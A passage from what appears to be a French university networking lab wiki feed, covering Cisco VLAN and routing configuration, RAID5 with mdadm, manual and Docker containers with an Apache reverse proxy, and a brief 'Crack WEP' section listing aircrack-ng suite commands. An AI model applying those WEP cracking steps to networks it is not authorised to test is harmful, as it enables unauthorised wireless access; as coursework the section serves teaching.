 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
===== Show Interface status =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
===== IPv6 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
===== IPv4 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données via RAID5===&lt;br /&gt;
====Les partitions====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
====Création du RAID====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
===Sécurisation Wifi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Crack WEP===&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=48945</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=48945"/>
				<updated>2018-12-17T18:36:06Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Sécurisation Wifi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
